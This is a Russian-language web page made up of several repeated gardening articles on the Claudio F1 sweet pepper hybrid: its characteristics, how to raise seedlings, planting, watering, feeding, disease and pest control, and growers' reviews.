2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец сладкий клаудио описание

Клаудио F1: описание перца и особенность его выращивания

Клаудио – один из лучших перцев, представленных на рынке гибридов. Яркий, сочный, ароматный, он богат витаминами, не требователен в уходе и порадует вас прекрасным урожаем.

Происхождение перца Клаудио F1

Перец Клаудио F1 – гибрид голландской линии компании NUNHEM. Рекомендован для южных широт. Включен в Госреестр селекционных достижений России в 2007 году для Северного Кавказа.

Характеристика и описание гибрида

Как и любой современный гибрид, Клаудио обладает высокой урожайностью, устойчивостью к болезням и переменам погоды и превосходными вкусовыми качествами.

Описание куста

Полураскидистые растения прямые, около 70 см в высоту, мощные и сильные. Для его формирования удаляются боковые побеги до первой развилки. Множественные тёмно-зелёные листья выше среднего размера, несколько морщинистые. Каждый куст даёт 10-12 крупных плодов.

Внешний вид плодов

Перцы большие, при полноценном уходе могут достигать 250 г, призмовидные, с 4 семенными камерами и толстыми стенками до 10 мм, глянцево-красные. Размеры плода в среднем составляют 8 см в ширину и 12-14 см в длину. Кожица крепкая, но тонкая.

Вкусовые качества

Клаудио славится превосходным вкусом. Насыщенная ароматная мякоть очень нежная и вкусная.

Особенности сорта и применение

В южных регионах перец относится к раннеспелым, севернее он скорее среднепоздний. При сборе технически зрелых зеленых плодов Клаудио превосходно хранится и легко переносит транспортировку. В таких условиях дозревает около 2 месяцев. Собранному же красным, требуется быстрая переработка или употребление.

Овощи универсальны в применении: великолепны свежими в салатах и овощных нарезках, сохраняют безупречный вкус после термической обработки, хороши в заморозке и при консервировании.

Агротехника выращивания перца Клаудио F1

Тщательный уход за растениями позволит получить хорошие урожаи до 464 ц/га с крупными сочными плодами.

Подготовка семян

Оптимальным периодом для посева рассады считается конец февраля – первые числа марта.

Посадочный материал перед продажей производители обрабатывают специальным питательным раствором, в таком случае никакой подготовки не требуется.

Семенам, покрытым цветной оболочкой, не нужно замачивание.

В случае самостоятельного сбора зёрен перца или покупки неподготовленных проведите предпосадочную подготовку:

  • опустите семена в стакан с водой температурой приблизительно 50 градусов;
  • после набухания заверните их в увлажненную ткань;
  • поместите в тепло на 3 дня.

Такие манипуляции стимулируют появление ростков.

Подготовка к посадке

Подготовка к посадке включает в себя несколько этапов:

  1. Для посева материала купите специальный рассадный грунт или приготовьте его самостоятельно. Для этого соедините равное количество перегноя, песка и садовой земли. Добавьте древесную золу из расчёта 1 ст. л. на 3 стакана смеси. Также можно воспользоваться торфяными стаканчиками, тогда дополнительно готовить почву не потребуется.
  2. Для обеззараживания прокалите грунт в духовке в течение получаса при температуре 160 градусов.
  3. Заполните почвой ёмкости для посадки. Идеальной формой для рассады будут ёмкости с дренажными отверстиями, установленные в поддон для полива.
  4. Полейте землю до посадки семян или обильно обрызгайте из пульверизатора после.
  5. Посевной материал заделывайте в почву на глубину 1-2 см, по 2-3 семечка, чтобы в дальнейшем оставить наиболее сильный росток.
  6. После посадки укройте ёмкости плёнкой или стеклом и оставьте в тепле до первых всходов.

Подробнее о том, когда и как сеять перец на рассаду узнайте на страницах нашего сайта.

Рассадный период и условия

При прорастании семян укрывной материал убирают и оставляют рассаду под хорошим освещением.

На несколько недель можно организовать дополнительный свет фитолампами, отключая их только на ночь.

В светлое время суток температура поддерживается на уровне 25 градусов, ночная около 12. Подросшие перцы закаливают, на неделю снижая температурный уровень днём до 17-18 градусов.

Для оптимальной влажности растения опрыскивают тёплой водой. Для полива её обязательно отстаивают. Холодная жидкость будет стрессом для рассады и может вызвать замедление роста или болезнь.

При появлении второго листка желательно подкормить растение. Используйте жидкие «Фертику» или «Агриколу». Или приготовьте раствор самостоятельно из суперфосфата (125 г), калийной соли (30 г) и мочевины (50 г) на ведро воды. Через 2 недели снова удобрите почву.

Когда и как подкормить рассаду перца узнайте со следующей статьи.

Высадка перцев

После формирования первых бутонов рассада готова к пересадке в теплицы или открытый грунт. Обычно это происходит к концу мая, когда среднесуточная температура воздуха не опускается ниже +15.

Клаудио F1 предпочитает слабо-кислую почву. Её подготавливают заранее. Самыми подходящими предшественниками будут огурцы, морковь, лук или кабачки. Благоприятным соседом по грядке окажется базилик.

Не высаживайте перцы на место, где в предыдущем году были помидоры, баклажаны или картофель.

Осенью будущее место посадки перекапывается и удобряется. На 1 кв. м добавляют по 50 г суперфосфата и сульфата калия и 5 кг компоста. Весной перед высадкой растений вносят по 30 г аммиачной селитры на каждый квадратный метр.

Для пересадки перцев в грунт:

  1. Учитывая раскидистость растений, придерживайтесь схемы посадки 40×70 см.
  2. В каждое углубление для посадки предварительно положите по столовой ложке удобрения с фосфором, калием и азотом.
  3. Поместите молодые растения в лунки и присыпьте землёй до уровня корневой шейк.
  4. Обильно полейте рассаду.
  5. При наличии возможности замульчируйте посадки торфом.

Полив

Хотя гибрид Клаудио и относится к засухоустойчивым, своевременный полив положительно влияет на качество плодов.

До начала цветения перец поливается еженедельно и довольно обильно, далее каждые 3-4 дня по 15 литров на 1 кв. м.

Вода обязательно должна быть отстоявшейся и тёплой. Лучшее время увлажнения – после захода солнца. После полива прорыхлите верхний слой почвы.

Подкормка

Растения подкармливают 2-4 раза за сезон. Дважды под корень вносят раствор куриного помёта в соотношении 1 к 10. Перед цветением полезно добавить калийную селитру. Во время плодоношения и цветения удобряют калием, магнием и фосфатами или комплексными препаратами. При созревании перца полезными будут калийные добавки.

По некоторым признакам можно определить, что недополучает растение:

  • сухие края листьев и их скрученность – недостаток калия;
  • мелкие матовые литья – мало азота;
  • фиолетовый оттенок нижней стороны листа – нехватка фосфора.

Устойчивость к болезням и вредителям

Для стойкого иммунитета перцев на первом месте стоит соблюдение правильной агротехники:

  • севооборот с учётом предпочтения предшественников;
  • прополка;
  • поддержание адекватной влажности;
  • прореживание и удаление поврежденных листьев;
  • обработка растений при первых признаках болезни.

Основные заболевания можно разделить на 3 вида:

Для борьбы с грибком (фитофтороз, антракноз, белая и серая гнили, бурая пятнистость, вертициллёз) используют обработку современными препаратами: «Оксихом», «Фундазол», «Превикур», «Барьер». С антракнозом отлично справляется бордосская смесь. При использовании строго следуйте инструкциям на упаковках.

Болезни, вызванные бактериями, лечат обработкой медным купоросом (мокрая плодовая гниль и бактериальный рак).

К одному из самых опасных вирусов – табачной мозаике – у Клаудио F1 отличная сопротивляемость. Но в случае поражения растение обрабатывают «Хризомалом». Против вирусного столбура проводят опрыскивание обезжиренным молоком или сывороткой. С ещё одним заболеванием этого вида – пятнистым увяданием – поможет справиться «Фундазол».

Перец Клаудио может заинтересовать и некоторых вредителей:

  • Тля. С ней отлично справляется древесная зола или табачная пыль. Неплохо зарекомендовало себя и опрыскивание настоявшимися полынью или пижмой.
  • Паутинный клещ. Лучшей обороной станут настои одуванчиков, луковой или чесночной шелухи.
  • Проволочники. Падки на сладкие корнеплоды, которые станут замечательной приманкой.
  • Слизни. В борьбе помогут молотый горький перец и горчичный порошок. Отлично действуют и зарытые в землю баночки с пивом.
  • Колорадский жук и медведка. Оптимальный вариант – уничтожение самих насекомых. Можно использовать промышленные препараты, учитывая время распада ядов для избежания отравлений плодами.
  • Белокрылка. Этих насекомых смывают водой, а после сбора урожая растения сжигают. В качестве временной помощи допустимо использовать пивные ловушки.

Достоинства и недостатки

К несомненным достоинствам Клаудио F1 относят:

  • высокие сборы плодов;
  • прекрасные вкусовые характеристики;
  • высокую транспортабельность;
  • универсальность условий выращивания;
  • широкое применение урожая;
  • устойчивость к погодным перепадам и болезням;
  • размеры перца и привлекательный товарный вид.

Основными недостатками можно назвать:

  • низкие сроки хранения вызревших красных плодов;
  • частое поражение вредителями;
  • длительный период дозревания от технического до биологического;
  • чувствительность к повышенной влажности.

Обзор сорта Клаудио F1, а также секреты выращивания можно узнать из следующего видео:

Отзывы

Некоторых может отпугнуть склонность Клаудио F1 подвергаться напастям вредителей, но если вы будете в ответе за то, что посадили – непревзойденный вкус урожая с лихвой компенсирует все затраты.

Сладкий перец Клаудио F1: отзывы, фото, особенности гибрида

Сладкий перец Клаудио относится к гибридам голландской селекции. Это один из самых популярных сортов среди огородников, включенный в Госреестр РФ в 2007 году. Рекомендован для культивирования в регионах с жарким и продолжительным летом. Однако благодаря раннеспелости и устойчивости к температурным катаклизмам может выращиваться и в местностях с прохладной и переменчивой погодой в условиях теплицы.

Описание и характеристика сорта

Перец Клаудио F1 ценится в первую очередь за раннеспелость и неприхотливость к погодным условиям. После того как рассада высажена на постоянное место, овощевод может рассчитывать на появление первого урожая спустя 72-80 дней в фазе технической спелости.

Гибрид формирует куст высотой 60 см в открытом грунте и до 0,9 м в условиях теплицы. Надземная часть у растения полураскидистая и мощная. Куст имеет хорошую облиственность, что позволяет защищать плоды от ожогов ультрафиолетом. На одном растении формируется до 12 плодов кубовидного типа, примерно одинакового размера.

На разрезе видно, что перец имеет 3 или 4 камеры и очень толстую стенку (см. фото). Толщина стенки перикарпия может варьироваться от 0,8 до 1,4 см.

В среднем длина плодов составляет 11-13 см. Самые первые и крупные экземпляры могут вытягиваться до 18 см. Диаметр (ширина) ближе к плодоножке при этом составляет 8-9 см.

Перцы на стадии технической спелости окрашены в темно-зеленый цвет. По мере дальнейшего созревания овощи меняют окраску на красную. Вес одного экземпляра составляет в среднем 200-260 гр.

С 1 куста собирают от 1 до 1,5 кг урожая в открытом грунте и 2-2,5 кг − в защищенном.

Вкусовые характеристики перца Клаудио оцениваются потребителями на отлично. Мякоть у плодов сочная и нежная, с выраженным перечным ароматом. Кожица с глянцевым оттенком, прочная, но тонкая.

Клаудио F1 идеально подходит для потребления свежим и всех видов кулинарных переработок.

Овощи обладают хорошей лежкостью и транспортабельностью, но только в фазе молочной спелости.

Снимать плоды с кустов рекомендуется зелеными. Так овощи не будут оттягивать на себя питательные вещества, необходимые для формирования новых завязей. В домашних условиях перец дозаривает в течение 2 месяцев.

Особенности выращивания и ухода

Перед тем как сеять семена перцев на рассаду, производитель рекомендует провести замачивание или проращивание. В обеззараживании посевной материал не нуждается, так как эту обработку проводит агрофирма, выпускающая гибридный продукт.

Высевают на рассаду с 20 февраля по 10 марта. Первые сеянцы в среднем появляются спустя 7-10 дней. Рассада Клаудио F1 требует обязательного закаливания и пикирования.

На постоянное место выращивания растения переносят в середине мая или начале июня (зависит от региона и защищенности грунта). Обязательное условие − отсутствия риска возвратных заморозков.

На кв. м. размещают не более 3-4 растений из-за особенностей строения кустов.

В уходе перец Клаудио не отличается от других сортов болгарского перца. Он требует обильного увлажнения почвы раз в 3-4 дня, прополки сорняков и рыхление грунта. Гибрид отзывчив на минеральные удобрения. Внесение подкормок во время полива повышают продуктивность растения. За сезон овощную культуру подкармливают 2-3 раза.

Куст можно формировать в 2-3 стебля. Дополнительно рекомендуется удалять первый цветок в развилке и все нижние листья с пасынками.

Болезни и вредители

Перец Клаудио по описанию производителя имеет генетическую устойчивость к вирусным заболеваниям, в частности табачной мозаике и Y-вирусу картофеля.

Гибридный сорт при нарушении правил агротехники может подвергаться вершинной гнили. Особенно болезнь актуальна для южных регионов.

Для перца опасны такие вредители, как слизни, проволочник, совка, белокрылка, колорадский жук и др.

Достоинства и недостатки

Перец Клаудио по характеристике и описанию сорта оригинатором, а также отзывам овощеводов, обладает следующими достоинствами:

  • семена хорошо и дружно всходят;
  • неприхотлив в уходе;
  • устойчив ко многим заболеваниям пасленовых;
  • хорошо переносит засуху и жару;
  • формирует крупные плоды с отличными вкусовыми качествами;
  • долго хранится при снятии в фазе технической спелости;
  • показывает высокую урожайность при соблюдении правил агротехники.

Среди недостатков некоторые огородники отмечают долгое дозаривание плодов.

Похожие сорта

Перец Клаудио F1 по описанию и характеристике имеет сходство со следующими гибридами:

  • Латино F1;
  • Эскимо F1;
  • Гигант красный F

Латино − раннеспелый сладкий перец, отдающий урожай после появления всходов спустя 3,5 месяца. Растение формирует куст высотой до 1 метра. Кубовидные перцы при полной спелости имеют насыщенный красный цвет. Плоды крупные и толстостенные. Один экземпляр весит 200 гр., толщина стенки перикарпия при этом может достигать 1 см. На кв. м. высаживают до 3 растений. При такой плотности посадок с соблюдением агротехнических правил культивирования можно получить 7-14 кг урожая. Гибрид подходит для выращивания под любыми видами укрытий. Овощная культура генетический устойчива к вирусу картофельной и табачной мозаики.

Эскимо − крупноплодный гибрид, масса перцев которого варьируется от 150 до 400 гр. Темно-красные кубовидные плоды наделены сочной, мясистой стенкой и отличными вкусовыми качествами. Растение имеет компактный, полураскидистый куст, вырастающий в высоту до 0,6 м. Устойчив к холодным погодным условиям, может культивироваться в незащищенном грунте. Период созревания плодов − 2 месяца после того, как рассада перемещена на постоянное место выращивания.

Гигант красный − еще один раннеспелый продукт голландской селекции. Плоды гибрида похожи на перцы Клаудио. Они кубовидной формы, толстостенные (до 12 мм), имеют ярко-красную окраску и вес до 300 гр. Центральный стебель может достигать в длину 1 м. Этот перец любит солнце и тепло, поэтому больше подходит для южных регионов.

Отзывы огородников

«Среди всех сортов перцев наибольшее предпочтение отдаю голландскому гибриду Клаудио Ф1. Сеять на рассаду начинаю в 20-х числах февраля. В начале мая пересаживаю рассаду в теплицу. В середине июля я уже с урожаем. Не жду, чтобы перцы на кустах поменяли цвет на красный. Снимаю их зелеными, они прекрасно доспевают дома. По вкусу перцы неплохи и при технической спелости, но полный вкусовой потенциал раскрывают только при полном созревании».

«Клаудио мой любимый гибрид. У него практически всегда стопроцентная всхожесть. Хоть и не рекомендуют брать семена от гибридов, в этом году решила все же рискнуть и вырастить перец из собственно собранных зернышек. Плоды получились немного мельче и не все правильной формы. На вкусовых качествах это никак не отразилось».

«Нравится этот перец за нетребовательность в уходе. Достаточно вовремя поливать и вносить удобрения. Чтобы растения не болели, рекомендую выращивать после лука, тыквы. Ни в коем случае нельзя сажать после баклажанов, помидоров и картофеля. Если культуры чем-то болели, есть большая вероятность и заражения перца».

Гибрид Клаудио предпочитают выращивать на своем участке многие огородники за счет его высокой урожайности, неприхотливости в уходе и хорошей лежкости в фазе технической спелости. Однако у перца есть достойные конкуренты, которые ни в чем ему не уступают или даже превосходят.

Перец Клаудио F1: характеристика и описание сорта

Перец Клаудио является гибридным сортом, полученным голландскими селекционерами. Его выращивают на дачных участках и в фермерских хозяйствах. Сорт выделяется ранним созреванием и стойкостью к заболеваниям. Высоко ценится его товарный вид и вкусовые качества овоща.

Ниже приведены фото, описание перца Клаудио, а также особенности его выращивания и ухода.

Ботаническое описание

Перец Клаудио обладает рядом характеристик:

  • гибридный сорт раннего созревания;
  • всхожесть семян от 97 до 100%;
  • после переноса рассады плодоношение наступает на 70-80 день;
  • мощные прямостоячие кусты;
  • высота кустов от 50 до 70 см;
  • на одном растении вырастает до 12 плодов.

Особенности плодов сорта Клаудио:

  • масса 200-250 г;
  • толщина стенок 10 мм;
  • призмовидная форма с 4 камерами;
  • незрелые перцы имеют насыщенный зеленый цвет, меняющийся на темно-красный;
  • высокие вкусовые качества.

Сорт подходит для посадки в теплицах и на открытых участках. Перец Клаудио отличается хорошей транспортабельностью и выдерживает длительные перевозки.

Плоды сорта Клаудио собирают в состоянии технической зрелости, тогда срок их хранения составляет до 2 месяцев. Если плоды уже покраснели, то их нужно срывать и использовать как можно скорее. Сорт Клаудио подходит для консервирования и ежедневного рациона.

Рассада перцев

Перец Клаудио F1 выращивают рассадным методом. Сначала готовят почву и емкости, в которые помещают семена. После прорастания за рассадой ухаживают и переносят ее на постоянное место.

Подготовка к посадке

Перцы высаживают в феврале – марте. Перед проведением работ семена сорта Клаудио опускают в воду, нагретую до 50 градусов. Когда семенной материал набухнет, его заворачивают во влажную ткань и оставляют на 3 дня в тепле. Так стимулируют появление ростков.

Если семена покрыты цветной оболочкой, то они не нуждаются в дополнительной обработке. Производитель покрыл материал питательной смесью, которая способствует развитию растений.

Под посадку сорта Клаудио готовят грунт, в состав которого входит:

  • перегной – 1 стакан;
  • песок – 1 стакан;
  • садовая почва – 1 стакан;
  • древесная зола – 1 ложка.

Компоненты перемешивают и дезинфицируют в нагретой духовке или микроволновке. После остывания почву раскладывают по отдельным стаканчикам. Семена сорта заглубляют в грунт на 2 см. В одну емкость можно посадить по 2-3 семечка, затем выбрать наиболее сильные растения.

При использовании ящиков подросшей рассаде сорта Клаудио потребуется пикировка. Перец плохо реагирует на пересадки, поэтому рекомендуется сразу высаживать семена в отдельные контейнеры.

После высадки грунт поливают, а емкости накрывают стеклом или полиэтиленом. Несколько дней посадки держат в теплом месте до прорастания семян.

Условия для рассады

При появлении всходов перцы Клаудио нуждаются в особом уходе:

  • дневная температура примерно 26 градусов;
  • ночная температура – 12 градусов;
  • умеренная увлажненность почвы;
  • полив отстоявшейся водой.

Рассаде обеспечивают высокую влажность. Перцы опрыскивают теплой водой. При воздействии холодной воды растения испытывают стресс, медленно развиваются и становятся подверженными к заболеваниям.

Помещение с рассадой сорта Клаудио регулярно проветривают. В течение 12 часов растениям обеспечивается доступ к свету.

При появлении у перцев второго листа их подкармливают жидким удобрением Агрикола или Фертика. Вторую подкормку выполняют через 14 дней.

Высадка перцев

При формировании у сорта Клаудио первых бутонов его высаживают в теплицу или на открытые участки. Работы проводят в конце мая, когда воздух прогреется до 15 градусов.

Перец предпочитает легкую почву с малой кислотностью. Подготовка грунта начинается за год до высадки растений. Наилучшими предшественниками для культуры являются кабачки, огурцы, лук, тыква, морковь.

Осенью при перекопке почвы на 1 кв. м вносят 5 кг компоста, по 50 г суперфосфата и сульфата калия. Весной перед высадкой добавляют 30 г аммиачной селитры.

При высадке между перцами Клаудио оставляют 40 см. Если организуется несколько рядов, то между ними делают промежутки в 70 см.

Перец Клаудио высаживают в лунки, куда предварительно помещают по 1 ст. л. любого комплексного удобрения, содержащего фосфор, азот и калий. Растения опускают в яму, не заглубляя корневую шейку. После засыпания корней землей выполняют обильный полив.

Схема ухода

При надлежащем уходе Перец Клаудио F1 дают хороший урожай. Посадки поливают и подкармливают, а грядки мульчируют, рыхлят и пропалывают от сорняков.

Здоровый и крепкий куст сорта Клаудио получают за счет формирования. На каждом растении устраняют центральный цветок, выросший на первой ветви. В результате повышается урожайность культуры. Перцы формируют в 2 или 3 стебля. Боковые побеги прищипывают вручную.

Полив

По отзывам перец Клаудио хорошо развивается даже в засуху. Однако максимальный урожай снимают при правильной организации полива.

Сорт Клаудио поливают каждую неделю, пока не начнется цветения. При образовании плодов интенсивность полива повышают до 2 раз в неделю. После внесения влаги грунт аккуратно рыхлят, чтобы не повредить корни перцев.

При недостатке влаги у перцев замедляется развитие, поникают листья, опадают завязи. Сохранить увлажненность грунта помогает мульчирование грядок перепревшей соломой.

Подкормка

Перцы подкармливают раствором куриного помета в соотношении 1:10. За сезон процедуру повторяют дважды. Удобрение вносят под корень.

Растения опрыскивают раствором нитрофоски (1 ст. л. на ведро воды). Обработка проводится по листу утром или вечером, когда нет прямых солнечных лучей.

Для опыления перцев Клаудио на участок привлекают насекомых. Поэтому посадки опрыскивают раствором, состоящим из 2 л воды, 4 г борной кислоты и 0,2 кг сахара. Борная кислота стимулирует формирование завязей у растений.

Недостаток полезных веществ у перцев определяют по внешним признакам:

  • скрученные листья и сухие края свидетельствуют о нехватке калия;
  • при наличии матовых мелких листьев растения подкармливают азотом;
  • появление фиолетового оттенка с нижней стороны листа говорит о необходимости внести фосфор.

Защита от болезней и вредителей

Сорт Клаудио остается стойким к вирусу табачной мозаики. Это опасное заболевание, справиться с которым можно только путем уничтожения пораженных растений.

Грибковые заболевания поражают перцы, растущие в условиях повышенной влажности. Для борьбы с ними посадки сорта Клаудио опрыскивают препаратами Акара, Оксихом, Барьер, Заслон. Через 20 дней обработку повторяют.

Сорт Клаудио привлекают тлю, паутинного клеща, слизней и проволочника. Бороться с тлей помогает настой на древесной золе или табачной пыли. Паутинного клеща отпугивают настоем листьев одуванчиков или луковой шелухи.

Против проволочника эффективны ловушки из сладких корнеплодов, которые привлекают вредителей. От слизней используют горчичный порошок, перемолотый горький перец.

Инсектициды против вредителей используют с осторожностью. Эффективными препаратами, которые быстро разлагаются, являются Кельтан и Карбофос.

Отзывы садоводов

Заключение

Перец Клаудио – это высокоурожайный сорт, дающий сладкие плоды. Его ценят за раннее созревание, хороший вкус, универсальное применение. Растения нуждаются в уходе, подразумевающем полив, подкормку, формирование куста.

Урожайный подарок от голландской фирмы «Nunhems» — перец Клаудио F1: характеристика и описание сорта

Перец Клаудио F1 – голландский гибрид, созданный селекционерами фирмы Nunhems. Семена этой фирмы всегда дружно всходят, из них получаются здоровые и сильные растения с крупными, вкусными плодами. У гибрида высокая урожайность и прекрасный вкус, его можно выращивать как для себя, так и на продажу.

Описание и характеристика сорта

Перец болгарский, то есть сладкий, Клаудио Ф1, создан в Голландии. Распространителем аналога семян является фирма «Престиж». Его можно выращивать в теплицах или открытом грунте. В средней полосе и на юге он хорошо себя чувствует без тепличных сооружений, но может потребоваться временное укрытие из пленки при снижениях температуры.

Высота куста составляет 70-80 см. Листья темно-зеленые, слегка морщинистые. По срокам созревания перец очень ранний: первые плоды достигают технической зрелости через 70-80 дней после всходов, а биологической – спустя 2-3 недели после этого.

Перцы имеют призмовидную форму, в биологической зрелости они красные. Размеры очень крупные – по 200-250 г. Стенки очень толстые, до 10 и даже 11 мм. В диаметре плоды около 8 см, а в длину – до 16 см.

Вкусовые качества высокие, мякоть сладкая, ароматная, сочная. Использовать можно для свежих блюд, консервации, заморозки и в кулинарных рецептах.

Преимущества и недостатки

  • высокая всхожесть семян до 97-100%;
  • раннеспелость;
  • стрессоустойчивость;
  • иммунитет к табачной мозаике;
  • устойчивость к ожогам;
  • прекрасный вкус;
  • высокая урожайность;
  • хороший товарный вид и выровненные плоды;
  • отличная транспортабельность и лежкость.

Минусы:

  • семена, полученные из урожая, могут не дать таких же качественных плодов.

Урожайность

С 1 куста получают около 2,5 кг плодов. Одновременно на растении вызревает до 12 перцев.

Посадка

Голландские семена высаживают в конце февраля или начале марта.

Подготовка семян

Посадочный материал гибридов обычно продается уже обеззараженным и обработанным стимуляторами. Можно замочить его для ускорения всхожести. Семена кладут в теплую воду (но не теплее +50 градусов) и дают набухнуть, затем перекладывают на блюдце, устеленное сырой тканью, или заворачивают во влажную тряпочку. Через 2-3 дня появятся ростки, и семена осторожно заделывают в неглубокие бороздки.

Подготовка к посеву

Почву готовят по рецепту:

  • 1 часть почвы с огорода;
  • 1 часть песка;
  • 1 часть перегноя или торфа;
  • 1 стакан золы на 10 кг смеси.

Смесь проливают кипятком, в котором разведен 1% марганцовки, или прожаривают в печи на противне при +100-110 градусах. Можно также приобрести готовый грунт для томатов и перцев в магазине.

Гибрид Клаудио рекомендуется сеять сразу в индивидуальные емкости, чтобы не травмировать пересадками. Оптимальная посуда – торфяные горшочки, но подойдут и пластиковые. В каждую емкость сеют по 2-3 семечка, увлажняют и ставят в тепло (+25-28 градусов). После всходов переносят на подоконник.

Рассадный период и условия

Перцу требуется тепло и длительное освещение. Дневная температура должна быть на уровне +20-26 градусов, ночную можно немного снизить, но не менее +12. Если световой день короче 12 часов, используют специальные лампы для рассады.

Поливают по необходимости отстоянной теплой водой, помещение проветривают. Рассаду подкармливают дважды: в фазе 2 листьев и спустя 2 недели после первой подкормки. Используют комплексы наподобие препарата «Агрикола».

Высадка

В мае рассаду переносят на участок. У кустов должно быть по 6-10 листочков и первые бутоны. Почва должна прогреться до +15.

Выбирают грядки в солнечном месте. Оптимальные предшественники – морковь, капуста, лук, тыква, кабачки, редька, редис, горох, фасоль. После томатов, картофеля, баклажанов и других сортов перца сажать можно только через 3-4 года.

Участок лучше подготовить с осени:

  1. Удалить старую ботву и остатки растений.
  2. Глубоко вскопать.
  3. При необходимости продезинфицировать.
  4. Внести удобрения: смесь из 50 г сульфата калия, 50 г суперфосфата и 5 кг компоста на каждый квадратный метр. Весной на такое же количество почвы добавляют по 30 г аммиачной селитры.

Проделывают лунки по схеме 40 на 70 см. В них кладут немного минеральных удобрений, но в них не должно быть слишком много азота. Сильно заглублять кустики не следует, они не пускают боковых корней. Высаживать лучше в мокрые лунки, обильно залитые водой.

Выращивание и уход

Формирование

Растения формируют и ведут в 2-3 стебля. При необходимости сооружают опоры. До первой развилки осторожно обрезают все побеги, ветви и листья. Также срезают центральный цветок с главного побега (стебля).

Полив

После укоренения поливают 1-2 раза в неделю. Во время плодообразования поливают дважды в неделю или чаще. Необходимо избегать длительных засух и застоя влаги. Используют теплую воду, отстоянную на солнце. Ее вносят под корень на рассвете или после заката, чтобы избежать ожогов от прямых солнечных лучей.

Подкормка

Перец подкармливают трижды за сезон минеральными удобрениями. Они должны содержать сбалансированное количество азота, калия и фосфора. Молодые кусты можно однократно полить раствором куриного помета 1:10, но чаще повторять процедуру нельзя, иначе от передозировки азота снизится урожайность.

Защита от болезней и вредителей

Из болезней для перца опасны грибки. Они развиваются при загущенности посадок, излишней сырости и холоде. Против них применяют препараты с медью, например, «Оксихом». Для профилактики фитофтороза опрыскивают раствором 1 л молочной сыворотки и 4-7 капель йода на ведро воды.

Против вредителей применяют инсектициды или мыльный раствор, настой луковой шелухи, чеснока, чистотела.

Перец Клаудио: отзывы, фото, урожайность, характеристика и описание сорта, достоинства и недостатки

Перец Клаудио отзывы, фото, урожайность, характеристика и описание сорта которого представлены в этой статье, выведен голландскими селекционерами. Гибридный сорт перца Клаудио характеризуется устойчивостью ко многим заболеваниям и ранним сроком созревания плодов. Также огородники отмечают красивый вид перцев и их отличные вкусовые качества.

Описание и характеристика сорта

Гибрид Клаудио вывели селекционеры Голландии.

  • Перец этого сорта можно выращивать в теплицах и открытом грунте.
  • Обладает ранним сроком созревания. Плоды достигают технической зрелости спустя 70-80 дней после пересадки рассады на постоянное место.
  • Всхожесть семян составляет 97-100%.
  • Кусты прямостоячие, в высоту вырастают до 70 см.
  • Листья большие зелёного цвета с лёгкой морщинистостью. Защищают плоды от прямых солнечных лучей.
  • Кусты перца Клаудио рекомендуется подвязывать к опоре, так как стебли могут упасть под весом плодов.
  • Высокая урожайность. Один куст дает порядка 12 перцев, примерно 2,5 кг.
  • Обладает хорошим иммунитетом к вирусу табачной мозаики. Если это заболевание поражает растения, их приходится полностью уничтожать. Чаще всего грибковые болезни появляются на перцах, которые выращиваются при повышенной влажности. Бороться с ними можно методом опрыскивания растений такими препаратами, как Актара, Оксихом, Барьер, Заслон. Обработку повторяют через 20 дней.

Характеристика плодов

  • Плоды имеют призмовидную форму.
  • Незрелые перцы окрашены в зелёный цвет, в стадии биологического созревания становятся тёмно-красными.
  • Каждый плод в среднем весит 200-250 г.
  • Стенки толстые около 10 мм.
  • Внутри расположены 4 семенных камеры.
  • Отличный вкус.
  • Хорошая лежкость.

Важно! При сборе перцев в стадии технического созревания, их срок хранения составляет 60 дней. Если плоды покраснели, их нужно переработать как можно быстрее.

  • Устойчивость к длительным перевозкам.

Далее представлены в фото перцев сорта Клаудио.

Достоинства и недостатки

У этого гибрида есть множество положительных качеств, о которых поговорим дальше:

  • Высокая урожайность.
  • Товарный вид.
  • Отличный вкус.
  • Дружная и одновременная всхожесть семян и созревание плодов.
  • Можно выращивать в открытом и закрытом грунте.
  • Быстро приспосабливается к различным погодным условиям.
  • Устойчив к транспортировке.
  • Универсальность применения.

Однако кроме преимуществ, у этого сорта также есть свои недостатки:

  • Требователен к уровню влажности грунта.
  • Долго переходит от технической в биологическую стадию созревания.

Особенности выращивания

Гибридный сорт перцев Клаудио F1 культивируют при помощи рассады.

Когда и как сажать

Семена на рассаду высевают в конце февраля-начале марта. Перед этим их погружают в стакан с водой, температура которой составляет 50 градусов. После набухания семян, их заворачивают во влажную ткань и оставляют в тепле на 3 суток. Данная процедура необходима для стимуляции появления ростков.

Совет! Семена с цветной оболочкой не нуждаются в дополнительной обработке, так как уже покрыты питательной смесью, их нельзя замачивать.

Грунт покупают в садовом магазине или готовят самостоятельно по такому рецепту:

  • 1 стакан перегноя;
  • 1 стакан песка;
  • 1 стакан садовой земли;
  • 1 ст. ложка древесной золы.

Смесь тщательно перемешивают и обеззараживают в духовке в течение 30 минут при 160 градусов. После того, как грунт остынет, его выкладывают в отдельные стаканчики.

Так как рассада перца плохо переносит пикировку, рекомендуется сразу использовать отдельные емкости.

Семена заглубляют почву на 1-2 см. В 1 стаканчик можно посадить несколько семян, чтобы в дальнейшем оставить только самое крепкое растение.

Совет! Высевать семена также можно в торфяные горшочки, тогда готовить грунт не надо.

После процедуры почву поливают теплой водой из пульверизатора, емкости накрывают пленкой или стеклом и выдерживают несколько дней в тёплом помещении, пока посевной материал не прорастет.

После появления всходов плёнку убирают, придерживаются такой агротехники:

  • температура днём должна составлять около 26 градусов;
  • ночью температура снижают до 12 градусов;
  • почва должна быть умеренно влажной;
  • поливают рассаду тёплой отстоянной водой.

Также необходимо поддерживать определенный уровень влажности воздуха. Для этого перцы опрыскивают теплой водой. Если использовать холодную воду, это окажется стрессом для растений, и они замедлят рост на несколько недель или заболеют.

Помещение, где находится рассада, надо ежедневно проветривать. Для нормального роста саженцы должны получать каждый день 12 часов дневного света. При необходимости надо организовать дополнительную подсветку.

Подкормка рассады

До высадки в грунт рассаду можно подкормить 2 раза. Когда у растений появится второй листок, проводят подкормку жидким удобрением Агрикола или Фертика или для удобрения на 10л воды берут:

  • 50 г Мочевины;
  • 30 г Калийной соли;
  • 125 г Суперфосфата.

Данную процедуру повторяют через 2 недели.

После удобрения рассаду нужно сразу полить чистой водой. По мере роста саженцев землю в емкости досыпают.

Пересадка рассады в грунт

Когда на рассаде начнут формироваться первые бутоны, ее пересаживают в теплицу или открытый грунт. Это происходит примерно в конце мая. К тому времени среднесуточная температура воздуха должна составлять около 15 градусов.

Кусты перца хорошо растут в легкой почве со слабой кислотностью. Грунт готовят с осени. Выбирают те места, на которых до этого росли кабачки, огурцы, лук, тыква, морковь.

